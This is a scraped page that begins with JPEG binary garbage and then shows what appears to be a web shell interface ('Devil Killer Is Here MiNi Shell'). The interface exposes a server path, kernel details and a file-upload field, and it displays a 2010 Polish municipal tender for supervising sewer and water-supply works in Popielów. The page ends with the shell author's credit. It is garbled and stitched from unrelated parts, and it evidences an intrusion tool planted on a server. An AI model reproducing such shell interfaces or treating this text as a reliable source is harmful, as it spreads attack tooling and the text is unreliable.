JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100412/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100412/101206-N-2010.html

<p class="kh_header"><b>Popielów: Pełnienie funkcji inspektora nadzoru inwestorskiego dla zadania pn. Rozbudowa infrastruktury technicznej w Gminie Popielów poprzez budowę kanalizacji sanitarnej i deszczowej w Karłowicach oraz budowę kanalizacji sanitarnej i wymianę sieci wodociągowej w Kurzniach</b><br>
<b>Numer ogłoszenia: 101206 - 2010; data zamieszczenia: 12.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy , ul. Opolska 13, 46-090 Popielów, woj. opolskie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.popielow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji inspektora nadzoru inwestorskiego dla zadania pn. Rozbudowa infrastruktury technicznej w Gminie Popielów poprzez budowę kanalizacji sanitarnej i deszczowej w Karłowicach oraz budowę kanalizacji sanitarnej i wymianę sieci wodociągowej w Kurzniach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest nadzór inwestorski na budową kanalizacji sanitarnej i deszczowej w Karłowicach oraz budową kanalizacji sanitarnej i wymianę sieci wodociągowej w Kurzniach. Budowa kanalizacji jest w trakcie realizacji, a zakres robót zrealizowanych wynosi 6%. Oznacza to, że nadzór inwestorski dotyczyć będzie 94% zakresu rzeczowego zadania przedstawionego poniżej:
Pełny Zakres rzeczowy zadania obejmuje:
I.	Kanalizacja sanitarna:
1.	Karłowice
a)	Kanalizacja grawitazcyjna
- Kanały PVC o śr.200/5,9                                                                               L=3508 m
- Kanały kam. śr. 200mm (przeciski sterowane metoda mikrotunelingu)         L=159 m
- Studzienki kanaliz. bet. śr. 1000 mm na kanałach PVC śr. 200mm                szt. 58
- Studzienki kanaliz. PE śr. 600 mm na kanałach PVC 200 mm                       szt. 46
- Rurociągi grawitacyjne przyłączeniowe PVC śr. 160 mm   szt. 137               L=1686m
- Studzienki kanaliz. PP śr. 425 mm na ruruoc. grawit. przyłącz. śr. 160 mm   szt. 139
- Przewierty w rurach och. stal. Śr. 324/7,1 mm szt 2                            L=14+12=26 m 
b)	Kanalizacja ciśnieniowa 
- Pompownie przydomowe ścieków z PE. Śr. 800 mm                                    kpl. 63
- Pompownia przydomowa ścieków z kregów bet. śr. 1200 mm kpl. 1 (bud. Wielorodzinny)
- Rurociągi ciśnieniowe przyłączeniowe PE śr. 40÷50 mm                          L=2823m
           (w tym przewierty sterowne wg. Zestawienia L=224)
- Zbiorcze rurociągi tłoczne ścieków PE śr. 63÷125 mm                              L=4485 m
           (w tym przewierty sterowne wg. Zestawienia L=224)
- Przewierty sterowne rur ochronnych z PE śr. 140÷200 mm                        L=262 m (dla przejść rurociągów tłocznych ścieków pod drogą powiatową oraz Młynówka Karłowicką) 
- Studzienki kontrolna z zasuwami  SK-1, SK-2, SK-3                                    kpl. 3  
c)	Pompownia sieciowa ścieków PK-1 O 1500 mm wraz z uzbrojeniem towarzyszącym
- pompownia PK-1 wykonana z polimerobetonu O 1500 mm
- komora zasuw z kręgów bet. O 1500 mm
- rurociąg wodociągowy PE O 90 mm zakończony hydrantem (doprow. Wody do płukania pomp)                                                                                            L = 33 m
- linia kablowa energetyczna zasilająca pompownię PK-1
d)	Pompownia sieciowa ścieków PK-2 O 1200 mm wraz z uzbrojeniem towarzyszącym
- pompownia PK-2 wykonana z polimerobetonu O 1200 mm
- linia kablowa energetyczna zasilająca pompownię PK-2
e)	Pompownia sieciowa ścieków PK-3 O 1200 mm wraz z uzbrojeniem towarzyszącym
- pompownia PK-3 wykonana z polimerobetonu O 1200 mm
- rurociąg wodociągowy PE O 90 mm zakończony hydrantem (doprow. wody do płukania   pomp) L = 25 m
- linia kablowa energetyczna zasilająca pompownię PK-3
2.	Kurznie
a)	Kanalizacja grawitazcyjna
- Kanały PVC o śr.200/5,9                                                                               L=2091 m
- Studzienki kanaliz. bet. śr. 1000 mm na kanałach PVC śr. 200mm                szt. 22
- Studzienki kanaliz. PE śr. 600 mm na kanałach PVC 200 mm                       szt. 35
- Rurociągi grawitacyjne przyłączeniowe PVC śr. 160 mm   szt. 98               L=883 m
- Studzienki kanaliz. PP śr. 425 mm na ruruoc. grawit. przyłącz. śr. 160 mm   szt. 96
- Studzienki kanaliz. PP śr. 425 mm przykanal. śr. 160 mm                              szt. 93 
- Przeciski sterowne rur ochr. z PE śr. 280/16.6 (dla kanałów PVCśr. 160mm) szt. 7  L=80m 
b)	Kanalizacja ciśnieniowa 
- Pompownie przydomowe ścieków prefabrykowane z PE śr. 800mm           kpl. 40
- Rurociągi ciśnieniowe przyłączeniowe PE śr. 40÷50 mm                            L=1255 m
           (w tym przewierty sterowne wg. Zestawienia L=268)
- Rurociągi tłoczne ścieków PE śr. 63÷90 mm                                               L=2282 m
           (w tym przewierty sterowne wg. Zestawienia L=1142)
- Przewierty sterowne rur ochronnych z PE śr. 200/11.9 mm                            L=32 m
              (dla przejścia ruroc. Tłoczn. Ścieków PE śr. 90mm pod torami PKP) 
c)	Pompownia sieciowa ścieków P-1 O 1200 mm wraz z uzbrojeniem towarzyszącym
- pompownia P-1 wykonana z polimerobetonu O 1200 mm                          kpl. 1
- rurociąg wodociągowy PE O 90 mm zakończony hydrantem (doprow. wody do płukania pomp) L = 18 m
- linia kablowa energetyczna zasilająca pompownię P-1
 Kanalizacja grawitacyjna obejmuje wykonanie przyłączy kanalizacyjnych do pierwszej studni na terenie prywatnej posesji.
II.	Kanalizacja deszczowa  w Karłowicach
- remont klapy zwrotnej na wylocie istn. kanału bet. O 1000 mm do Młynówki Karłowickiej
(oczyszczenie z rdzy, nasmarowanie i przywrócenie do sprawnego działania klapy zwrotnej)                                                                                                                     kpl. 1
- oczyszczenie piaskownika i wykonanie nowego przykrycia balami drewnianymi    kpl. 1
- demontaż istn. rurociągów dopływowych i odpływowych z piaskownika żel. O300mm wraz z zasuwami (4x4m=16m)                                                                           	    L =16m 
- wykonanie nowych rurociągów dopływowych i odpływowych z piaskownika z rur bet. WIPRO O 400 mm (4 x 4 m = 16 m)                                                                     L= 16 m 
- montaż na wlocie i wylocie rurociągów do piaskownika zastawek kanałowych żel. O 400 mm                                       szt. 4
- rozbiórka istn. kanałów betonowych O 600 mm i O 1000 mm z tymczasowym przepompowaniem wód deszczowych                                                                 L= 599 m
- ułożenie odcinka kolektora deszczowego z rur bet. WIPRO O 800 mm wraz z włączeniem bocznych kanałów deszczowych                                                     L=258 m
- ułożenie odcinka kolektora deszczowego z rur bet. WIPRO O 600 mm wraz z włączeniem bocznych kanałów deszczowych                                                     L= 341 m
III.	Wymiana sieci wodociągowej w Kurzniach
- rurociągi wodociągowe PE O 90 ÷110 mm					L = 3370 m
	 (w tym przewierty sterowane wg zestawienia L = 366 m)
- przyłącza wodociągowe PE O 32 ÷90 mm szt. 137                                               L = 3366 m
	 (w tym przewierty sterowane wg zestawienia L = 297 m)
- instalacje wodociągowe wewnętrzne O 32 ÷90 mm	    			kpl. 137
- studzienki bet. O 1200 z trójnikiem Combi uzbrojonym w 3 zasuwy O100 mm 	kpl. 2
- zasuwy odcinające O 100 mm z końcówkami do zgrzewania rur PE 		szt. 8
- hydranty nadziemne z zasuwami odcinającymi kołnierzowymi O80 mm 	kpl 28.



Obowiązki wykonawcy:
1.	Inspektor pełnić będzie nadzór inwestorski w pełnym zakresie wynikającym z przepisów Prawa budowlanego - art. 25 i art. 26 ustawy (Dz.U. 2006 Nr 156, poz. 1118) oraz przepisów wykonawczych, a w szczególności poprzez:
- reprezentowanie inwestora na budowie przez sprawowanie kontroli zgodności jej realizacji z projektem i pozwoleniem na budowę, przepisami oraz zasadami wiedzy technicznej oraz umową o realizację inwestycji.
- sprawdzanie jakości wykonywanych robót i wbudowanych wyrobów budowlanych, a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie
- sprawdzenie i odbiór robót budowlanych ulegających zakryciu lub zanikających, uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych oraz przygotowanie i udział w czynnościach odbioru gotowych obiektów budowlanych i przekazywanie ich do użytkowania
- potwierdzenie faktycznie wykonanych robót oraz usunięcia wad
- kontrolowanie rozliczeń budowy
2.	Inspektor przekaże Zamawiającemu w dniu końcowego odbioru robót sprawdzony przez siebie komplet atestów, certyfikatów zastosowanych materiałów oraz protokołów z pomiarów i prób wykonywanych w trakcie trwania robót.
W ramach powierzonych obowiązków Wykonawca jest zobowiązany do:
1.	dokonanie wpisu do dziennika budowy stwierdzającego podjęcie pełnienia nadzoru inwestorskiego nad określonymi robotami
2.	koordynowanie prac pomiędzy specjalnościami i dokonywanie ustaleń wynikających z harmonogramu realizacji inwestycji
3.	sprawdzanie jakości, ilości wykonywanych robót i wbudowywanych materiałów
4.	kontrola dokumentów potwierdzających dopuszczenie tych materiałów do obrotu i stosowania w budownictwie
5.	kontrolowanie zgodności realizacji inwestycji z zapisami umowy
6.	wydawanie kierownikowi budowy lub kierownikowi robót poleceń, potwierdzonych wpisem do dziennika budowy, dotyczących usunięcia nieprawidłowości lub zagrożeń, wykonanie prób lub badań, także wymagających odkrycia robót lub elementów
7.	żądanie od kierownika budowy lub kierownika robót wykonania poprawek bądź ponownego wykonania wadliwie wykonanych robót
8.	wstrzymanie robót budowlanych w przypadku, gdy ich kontynuacja może wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność z projektem lub pozwoleniem na budowę
9.	uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych
10.	potwierdzenie faktycznie wykonanych robót oraz usunięcia wad
11.	sprawdzanie i dokonywanie odbiorów robót zanikających i (lub) ulegających zakryciu
12.	sprawdzanie protokołów odbiorów częściowych i akceptowanie ich w zakresie rzeczowym i rachunkowym
13.	uzgadnianie z Zamawiającym wszelkich zmian projektowych i materiałowych
14.	dokonywanie odbioru zakończonych części robót budowlanych
15.	w zakresie odbioru końcowego inwestycji:
a)	dokonanie odbioru od wykonawcy robót dokumentacji powykonawczej, atestów materiałowych
b)	dopilnowanie dokonywania stosownych zapisów w dzienniku budowy
c)	powiadomienia Zamawiającego o gotowości do odbioru końcowego
d)	uczestnictwo w pracach komisji odbiorowej powołanej przez Zamawiającego
e)	zorganizowanie i przeprowadzenie odbioru
16.	przygotowanie dokumentów do złożenia przez Zamawiającego wniosku o pozwolenie na użytkowanie lub zgłoszenie zakończenia budowy
17.	wykonywanie wszelkich innych czynności faktycznych i prawnych związanych z właściwym prowadzeniem inwestycji
18.	Wykonawca jest zobowiązany do opracowania:
a)	comiesięcznych raportów zawierających informacje o stanie zaawansowania inwestycji, analizę zgodności terminów, ocenę jakości wykonywania robót i występujących głównych problemów
b)	raportów interwencyjnych dotyczących nagłych i nieprzewidzianych zdarzeń mających wpływ na termin i budżet inwestycji, przekazywanych do Zamawiającego w terminie 2 dni od zdarzenia
c)	raportów rozliczeniowych, składanych w terminie 14 dni od zakończenia etapu inwestycji określonego w harmonogramie inwestycji

 Przepisy prawa
Wykonawca ma obowiązek znać i stosować w czasie prowadzenia usług wszelkie aktualne przepisy dotyczące ochrony środowiska, ochrony przeciwpożarowej, bezpieczeństwa i higieny pracy, prawa o ruchu drogowym, o drogach publicznych, prawa budowlanego, i inne związane w zakresie wykonywanych prac..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.52.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>udokumentowane należyte wykonanie, w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, dwóch zadań polegających na pełnieniu nadzoru inwestorskiego dla robót  zwianych z budową sieci kanalizacji sanitarnej ciśnieniowej - 20 km, grawitacyjnej - 6 km, przepompowni ścieków - 40 szt.  oraz budowie sieci wodociągowej - 5 km (z podaniem ich wartości, dat wykonania oraz odbiorców).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponuje osobami, posiadającymi stosowne uprawnienia budowlane do pełnienia samodzielnych funkcji w budownictwie w zakresie kierowania robotami budowlanymi w specjalności: 
- instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych bez ograniczeń w rozumieniu §23 ust. 1 rozporządzenia Ministra Transportu i Budownictwa z 28 kwietnia 2006r. w sprawie samodzielnych funkcji technicznych w budownictwie(Dz. U. z 2006r. Nr 83 poz. 578) 
- instalacji w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń w rozumieniu  § 24 ust 1 cytowanego wyżej rozporządzenia
- w specjalności drogowej bez ograniczeń w rozumieniu  § 18 ust. 1 cytowanego wyżej rozporządzenia      
należącymi do Okręgowej Izby Inżynierów Budownictwa i posiadającymi ubezpieczenie od odpowiedzialności cywilnej</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy (w tym terminu) w stosunku do treści oferty oraz określa warunki takiej zmiany, tj. 
-zmiany przepisów powodujących konieczność zastosowania innych rozwiązań niż zakładano w opisie przedmiotu zamówienia,
-zmiany osób reprezentujących, w przypadku zmian organizacyjnych,
-w każdym przypadku gdy zmiana jest korzystna dla zamawiającego (np. gdy obniży to koszty inwestycji albo skróci czas realizacji),
-w przypadku wystąpienia udokumentowanych niekorzystnych warunków pogodowych, uniemożliwiających  prowadzenie robót zgodnie z wymaganiami technicznymi określonymi w SIWZ oraz STWiORB  Zamawiający może zmienić termin realizacji umowy,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.popielow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzad Gminy w Popielowie ul. Opolska 13 46-090 Popielow pok nr 12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.04.2010 godzina 09:45, miejsce: Urząd Gminy Popielów, ul. Opolska 13 46-090 Popielów, Kancelaria Wójta I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego
w ramach Regionalnego Programu Operacyjnego Województwa Opolskiego na lata 2007-2013
/inwestujemy w Twoją przyszłość/.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com